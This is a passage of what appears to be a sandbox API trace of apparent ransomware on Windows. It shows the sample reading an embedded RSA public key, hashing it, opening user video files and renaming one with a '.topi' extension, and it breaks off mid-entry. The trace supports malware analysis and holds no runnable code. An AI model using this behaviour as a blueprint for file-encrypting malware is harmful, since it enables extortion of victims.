[0099.088] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x47e, lpOverlapped=0x0) returned 1 [0099.088] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.088] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0099.088] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.088] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.088] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0099.089] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0099.089] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.089] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0099.089] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0099.089] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0099.089] GetLastError () returned 0x0 [0099.090] CryptDestroyHash (hHash=0x31c7580) returned 1 [0099.090] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0099.090] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0099.090] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0099.090] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0099.090] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0099.090] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0099.090] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0099.090] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0099.090] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x480) returned 0x9a04420 [0099.090] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.090] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0099.090] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0099.091] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\sFJurkoQTJwuNyD54_K\\f-6wzGI cjqU38MV0oz.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\sasxhx217z\\sfjurkoqtjwunyd54_k\\f-6wzgi cjqu38mv0oz.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\sFJurkoQTJwuNyD54_K\\f-6wzGI cjqU38MV0oz.flv.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\sasxhx217z\\sfjurkoqtjwunyd54_k\\f-6wzgi cjqu38mv0oz.flv.topi")) returned 1 [0099.091] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3189d50 | out: hHeap=0x680000) returned 1 [0099.091] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0099.091] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0099.093] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce680430, ftCreationTime.dwHighDateTime=0x1d5c08e, ftLastAccessTime.dwLowDateTime=0xe4a22260, ftLastAccessTime.dwHighDateTime=0x1d5bd4d, ftLastWriteTime.dwLowDateTime=0xe4a22260, ftLastWriteTime.dwHighDateTime=0x1d5bd4d, nFileSizeHigh=0x0, nFileSizeLow=0x4e3f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OfhU48bhc1pTaLoL1.avi", cAlternateFileName="OFHU48~1.AVI")) returned 1 [0099.093] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\sFJurkoQTJwuNyD54_K\\OfhU48bhc1pTaLoL1.avi") returned=".avi" [0099.093] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\sFJurkoQTJwuNyD54_K\\OfhU48bhc1pTaLoL1.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\sasxhx217z\\sfjurkoqtjwunyd54_k\\ofhu48bhc1ptalol1.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0099.093] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=20031) returned 1 [0099.093] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0099.096] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x4e19, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.097] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0099.097] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0099.098] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0099.098] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.098] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0099.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0099.099] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0099.099] GetLastError () returned 0x0 [0099.099] CryptDestroyHash (hHash=0x31c7580) returned 1 [0099.099] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0099.099] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0099.099] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0099.099] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0099.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0099.099] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0099.099] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0099.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0099.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4e40) returned 0x99fc2d8 [0099.099] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.099] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0099.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0099.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0099.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0099.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0099.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fc100 [0099.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e51f8 [0099.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fc148 [0099.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5210 [0099.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5240 [0099.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0099.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5258 [0099.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0099.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0099.100] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0099.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0099.100] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5240 | out: hHeap=0x680000) returned 1 [0099.100] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5258 | out: hHeap=0x680000) returned 1 [0099.100] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0099.100] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0099.100] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0099.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0099.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0099.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e5258 [0099.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0099.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e5240 [0099.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0099.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0099.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0099.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0099.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0099.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0099.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0099.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0099.100] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0099.100] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5258 | out: hHeap=0x680000) returned 1 [0099.100] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0099.100] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5240 | out: hHeap=0x680000) returned 1 [0099.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0099.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0099.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0099.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0099.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0099.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0099.101] GetCurrentThreadId () returned 0x8c4 [0099.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0099.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99fb1e0 [0099.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0099.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0099.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x3112760 [0099.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0099.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0099.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0099.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0099.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0099.101] GetCurrentThreadId () returned 0x8c4 [0099.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0099.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0099.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0099.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0099.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0099.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0099.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0099.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0099.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0099.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0099.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0099.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0099.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0099.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0099.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0099.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0099.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0099.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0099.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0099.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0099.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0099.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0099.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0099.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5240 [0099.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0099.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0099.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0099.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0099.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0099.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0099.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0099.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5258 [0099.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0099.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0099.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0099.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5228 [0099.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0099.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0099.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0099.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0099.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0099.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0099.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0099.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e5270 [0099.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0099.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e49d0 [0099.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0099.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0099.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0099.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0099.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0099.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0099.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5240 | out: hHeap=0x680000) returned 1 [0099.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5240 [0099.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0099.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0099.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0099.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0099.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0099.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0099.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0099.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0099.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0099.104] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191cf0 [0099.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5240 | out: hHeap=0x680000) returned 1 [0099.104] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0099.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0099.104] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0099.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0099.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0099.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0099.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0099.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0099.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191cf0 | out: hHeap=0x680000) returned 1 [0099.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0099.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0099.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0099.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0099.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5270 | out: hHeap=0x680000) returned 1 [0099.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0099.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0099.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0099.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5258 | out: hHeap=0x680000) returned 1 [0099.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5228 | out: hHeap=0x680000) returned 1 [0099.105] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3112760 | out: hHeap=0x680000) returned 1 [0099.105] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0099.105] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0099.105] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5210 | out: hHeap=0x680000) returned 1 [0099.105] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fc148 | out: hHeap=0x680000) returned 1 [0099.105] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0099.105] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0099.105] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0099.105] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0099.105] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0099.105] HeapFree (in: hHeap=0x680000, dwFlags=0x0, 